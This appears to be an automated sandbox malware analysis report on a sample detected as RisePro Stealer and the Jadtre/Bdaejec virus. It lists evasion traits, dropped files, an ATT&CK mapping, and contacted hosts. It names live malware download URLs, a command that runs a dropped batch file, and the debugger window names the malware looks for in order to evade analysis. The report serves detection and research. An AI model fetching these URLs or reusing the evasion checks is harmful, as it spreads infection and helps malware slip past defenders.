Source: Amcache.hve.2.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: RageMP131.exe, 00000011.00000002.3926399137.00000000016D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: MlpxPf.exe, 00000002.00000003.1465075782.0000000001349000.00000004.00000020.00020000.00000000.sdmp, MlpxPf.exe, 00000002.00000002.1570645851.000000000132E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWL
Source: Lisect_AVT_24003_G1A_37.exe, 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000008.00000002.3921592107.0000000000B07000.00000040.00000001.01000000.00000009.sdmp, MPGPH131.exe, 0000000B.00000002.3913587401.0000000000B07000.00000040.00000001.01000000.00000009.sdmp, RageMP131.exe, 00000011.00000002.3910001656.0000000000C07000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: MlpxPf.exe, 00000012.00000003.1801469713.00000000012F4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\user
Source: RageMP131.exe, 00000011.00000002.3926399137.00000000016D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&=

Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe

API call chain: ExitProcess graph end node

graph_2-1034

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Thread information set: HideFromDebugger	Jump to behavior

Potentially malicious time measurement code found

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	Code function: 0_2_04E8030D Start: 04E8039B End: 04E80368		0_2_04E8030D
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 11_2_054C0052 Start: 054C00AD End: 054C0072		11_2_054C0052

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	Process queried: DebugPort	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Process queried: DebugPort	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Process queried: DebugPort	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Process queried: DebugPort	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Process queried: DebugPort	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Process queried: DebugPort	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe

Code function: 0_2_04E80C47 rdtsc

0_2_04E80C47

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	Code function: 0_2_00847044 mov eax, dword ptr fs:[00000030h]	0_2_00847044
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	Code function: 0_2_00284AB0 mov eax, dword ptr fs:[00000030h]	0_2_00284AB0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 8_2_00E07044 mov eax, dword ptr fs:[00000030h]	8_2_00E07044
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 8_2_00844AB0 mov eax, dword ptr fs:[00000030h]	8_2_00844AB0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 11_2_00E07044 mov eax, dword ptr fs:[00000030h]	11_2_00E07044
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 11_2_00844AB0 mov eax, dword ptr fs:[00000030h]	11_2_00844AB0
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 17_2_00F07044 mov eax, dword ptr fs:[00000030h]	17_2_00F07044
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 17_2_00944AB0 mov eax, dword ptr fs:[00000030h]	17_2_00944AB0

Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\43f50b5b.bat" "

Jump to behavior

Source: SciTE.exe.2.dr	Binary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX
Source: Lisect_AVT_24003_G1A_37.exe, Lisect_AVT_24003_G1A_37.exe, 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: mProgram Manager

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe

Code function: 0_2_0034CCDC GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

0_2_0034CCDC

Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exe

Code function: 2_2_0035139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId,

2_2_0035139F

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.2.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.2.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.2.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.2.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.2.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Bdaejec

Source: Yara match	File source: Process Memory Space: MlpxPf.exe PID: 1840, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MlpxPf.exe PID: 7588, type: MEMORYSTR

Yara detected RisePro Stealer

Source: Yara match	File source: 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1525002999.0000000005240000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.1626636551.0000000005240000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1453867562.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.1524535143.0000000004B30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Lisect_AVT_24003_G1A_37.exe PID: 3712, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MPGPH131.exe PID: 6312, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MPGPH131.exe PID: 1304, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RageMP131.exe PID: 7572, type: MEMORYSTR

Remote Access Functionality

Yara detected Bdaejec

Source: Yara match	File source: Process Memory Space: MlpxPf.exe PID: 1840, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MlpxPf.exe PID: 7588, type: MEMORYSTR

Yara detected RisePro Stealer

Source: Yara match	File source: 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1525002999.0000000005240000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.1626636551.0000000005240000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1453867562.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.1524535143.0000000004B30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Lisect_AVT_24003_G1A_37.exe PID: 3712, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MPGPH131.exe PID: 6312, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MPGPH131.exe PID: 1304, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RageMP131.exe PID: 7572, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	2 Native API	1 Scripting	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	11 Input Capture	11 System Time Discovery	1 Taint Shared Content	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 Access Token Manipulation	3 Obfuscated Files or Information	LSASS Memory	4 File and Directory Discovery	Remote Desktop Protocol	11 Input Capture	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	12 Process Injection	13 Software Packing	Security Account Manager	215 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	11 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 Registry Run Keys / Startup Folder	1 Scheduled Task/Job	1 DLL Side-Loading	NTDS	1 Query Registry	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	1 Registry Run Keys / Startup Folder	1 Masquerading	LSA Secrets	751 Security Software Discovery	SSH	Keylogging	12 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	24 Virtualization/Sandbox Evasion	Cached Domain Credentials	24 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Access Token Manipulation	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	12 Process Injection	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Lisect_AVT_24003_G1A_37.exe	95%	ReversingLabs	Win32.Virus.Jadtre
Lisect_AVT_24003_G1A_37.exe	85%	Virustotal		Browse
Lisect_AVT_24003_G1A_37.exe	100%	Avira	W32/Jadtre.B
Lisect_AVT_24003_G1A_37.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	100%	Avira	W32/Jadtre.B
C:\Program Files\7-Zip\Uninstall.exe	100%	Avira	W32/Jadtre.B
C:\Users\user\AppData\Local\Temp\MlpxPf.exe	100%	Avira	TR/Dldr.Small.Z.haljq
C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	100%	Avira	W32/Jadtre.B
C:\ProgramData\MPGPH131\MPGPH131.exe	100%	Avira	W32/Jadtre.B
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Avira	W32/Jadtre.B
C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	100%	Joe Sandbox ML
C:\Program Files\7-Zip\Uninstall.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\MlpxPf.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	100%	Joe Sandbox ML
C:\ProgramData\MPGPH131\MPGPH131.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Joe Sandbox ML
C:\ProgramData\MPGPH131\MPGPH131.exe	95%	ReversingLabs	Win32.Virus.Jadtre
C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	95%	ReversingLabs	Win32.Virus.Jadtre
C:\Users\user\AppData\Local\Temp\MlpxPf.exe	92%	ReversingLabs	Win32.Trojan.Madeba

Source	Detection	Scanner	Label
http://www.scintilla.org/scite.rng	0%	URL Reputation	safe
http://www.rftp.comJosiah	0%	URL Reputation	safe
http://www.activestate.com	0%	URL Reputation	safe
http://www.activestate.comHolger	0%	URL Reputation	safe
http://ddos.dnsnb8.net:799/cj//k3.rar	100%	URL Reputation	malware
http://upx.sf.net	0%	URL Reputation	safe
http://www.rftp.com	0%	URL Reputation	safe
http://ddos.dnsnb8.net:799/cj//k2.rar	100%	URL Reputation	malware
http://www.baanboard.comBrendon	0%	URL Reputation	safe
https://www.smartsharesystems.com/	0%	URL Reputation	safe
http://www.scintilla.org	0%	URL Reputation	safe
http://www.spaceblue.comMathias	0%	URL Reputation	safe
https://www.smartsharesystems.com/Morten	0%	URL Reputation	safe
http://www.develop.com	0%	URL Reputation	safe
http://www.lua.org	0%	URL Reputation	safe
http://ddos.dnsnb8.net:799/cj//k1.rar	100%	URL Reputation	malware
http://www.spaceblue.com	0%	URL Reputation	safe
http://www.winimage.com/zLibDll	0%	URL Reputation	safe
http://www.baanboard.com	0%	URL Reputation	safe
http://www.develop.comDeepak	0%	URL Reputation	safe
http://ddos.dnsnb8.net:799/cj//k5.rarY	100%	Avira URL Cloud	malware
https://t.me/RiseProSUPPORTuH	0%	Avira URL Cloud	safe
https://t.me/RiseProSUPPORTu	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k2.rar=6	100%	Avira URL Cloud	phishing
https://t.me/RiseProSUPPORT	0%	Avira URL Cloud	safe
http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE	0%	Avira URL Cloud	safe
https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k2.rarp	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k1.rarH	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k5.rarq	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k5.rar	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k4.rarC:	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k1.rar66	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k2.rar#7	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k1.rar.7	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k4.rar	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k2.rarS6	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k3.rart	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k5.rarcC:	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k4.rark	100%	Avira URL Cloud	phishing

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ddos.dnsnb8.net	44.221.84.105	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ddos.dnsnb8.net:799/cj//k3.rar	true	URL Reputation: malware	unknown
http://ddos.dnsnb8.net:799/cj//k2.rar	true	URL Reputation: malware	unknown
http://ddos.dnsnb8.net:799/cj//k5.rar	false	Avira URL Cloud: malware	unknown
http://ddos.dnsnb8.net:799/cj//k1.rar	true	URL Reputation: malware	unknown
http://ddos.dnsnb8.net:799/cj//k4.rar	false	Avira URL Cloud: phishing	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://ddos.dnsnb8.net:799/cj//k5.rarY	MlpxPf.exe, 00000012.00000002.1802677497.0000000001248000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://t.me/RiseProSUPPORTu	Lisect_AVT_24003_G1A_37.exe, 00000000.00000002.3925994112.0000000000D7E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.scintilla.org/scite.rng	SciTE.exe.2.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k2.rar=6	MlpxPf.exe, 00000002.00000002.1570645851.000000000138A000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://www.rftp.comJosiah	SciTE.exe.2.dr	false	URL Reputation: safe	unknown
https://t.me/RiseProSUPPORTuH	RageMP131.exe, 00000011.00000002.3926399137.000000000169E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.activestate.com	SciTE.exe.2.dr	false	URL Reputation: safe	unknown
http://www.activestate.comHolger	SciTE.exe.2.dr	false	URL Reputation: safe	unknown
http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE	MlpxPf.exe, 00000002.00000002.1570296081.0000000000353000.00000002.00000001.01000000.00000004.sdmp, MlpxPf.exe, 00000002.00000003.1447308888.0000000001120000.00000004.00001000.00020000.00000000.sdmp, MlpxPf.exe, 00000012.00000002.1801946053.0000000000593000.00000002.00000001.01000000.00000004.sdmp, MlpxPf.exe, 00000012.00000003.1617245966.0000000001380000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll	Lisect_AVT_24003_G1A_37.exe, 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Lisect_AVT_24003_G1A_37.exe, 00000000.00000003.1453867562.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmp, MPGPH131.exe, 00000008.00000003.1524535143.0000000004B30000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000B.00000003.1525002999.0000000005240000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmp, RageMP131.exe, 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmp, RageMP131.exe, 00000011.00000003.1626636551.0000000005240000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://upx.sf.net	Amcache.hve.2.dr	false	URL Reputation: safe	unknown
http://www.rftp.com	SciTE.exe.2.dr	false	URL Reputation: safe	unknown
https://t.me/RiseProSUPPORT	Lisect_AVT_24003_G1A_37.exe, 00000000.00000002.3925994112.0000000000D7E000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000008.00000002.3926322511.0000000000F1D000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000000B.00000002.3926018738.000000000167A000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000011.00000002.3926399137.000000000169E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ddos.dnsnb8.net:799/cj//k1.rarH	MlpxPf.exe, 00000012.00000003.1624031200.00000000012B0000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://ddos.dnsnb8.net:799/cj//k2.rarp	MlpxPf.exe, 00000002.00000002.1571008023.0000000002E2A000.00000004.00000010.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://ddos.dnsnb8.net:799/cj//k5.rarq	MlpxPf.exe, 00000012.00000002.1802677497.00000000012AF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.baanboard.comBrendon	SciTE.exe.2.dr	false	URL Reputation: safe	unknown
https://www.smartsharesystems.com/	SciTE.exe.2.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k4.rarC:	MlpxPf.exe, 00000012.00000002.1802677497.0000000001286000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.scintilla.org	SciTE.exe.2.dr	false	URL Reputation: safe	unknown
http://www.spaceblue.comMathias	SciTE.exe.2.dr	false	URL Reputation: safe	unknown
https://www.smartsharesystems.com/Morten	SciTE.exe.2.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k2.rar#7	MlpxPf.exe, 00000002.00000002.1570645851.000000000138A000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://ddos.dnsnb8.net:799/cj//k1.rar.7	MlpxPf.exe, 00000002.00000003.1465075782.0000000001392000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.develop.com	SciTE.exe.2.dr	false	URL Reputation: safe	unknown
http://www.lua.org	SciTE.exe.2.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k1.rar66	MlpxPf.exe, 00000002.00000003.1465075782.0000000001392000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.spaceblue.com	SciTE.exe.2.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k2.rarS6	MlpxPf.exe, 00000002.00000002.1570645851.000000000138A000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.winimage.com/zLibDll	Lisect_AVT_24003_G1A_37.exe, 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Lisect_AVT_24003_G1A_37.exe, 00000000.00000003.1453867562.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmp, MPGPH131.exe, 00000008.00000003.1524535143.0000000004B30000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000B.00000003.1525002999.0000000005240000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmp, RageMP131.exe, 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmp, RageMP131.exe, 00000011.00000003.1626636551.0000000005240000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k5.rarcC:	MlpxPf.exe, 00000012.00000002.1802677497.0000000001286000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://www.baanboard.com	SciTE.exe.2.dr	false	URL Reputation: safe	unknown
http://www.develop.comDeepak	SciTE.exe.2.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k3.rart	MlpxPf.exe, 00000012.00000002.1802677497.00000000012AF000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://ddos.dnsnb8.net:799/cj//k4.rark	MlpxPf.exe, 00000012.00000002.1802677497.00000000012AF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
44.221.84.105	ddos.dnsnb8.net	United States		14618	AMAZON-AESUS	false
193.233.132.62	unknown	Russian Federation		2895	FREE-NET-ASFREEnetEU	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1481140
Start date and time:	2024-07-25 04:52:11 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 37s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	25
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Lisect_AVT_24003_G1A_37.exe
Detection:	MAL
Classification:	mal100.spre.troj.evad.winEXE@26/29@1/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.189.173.22
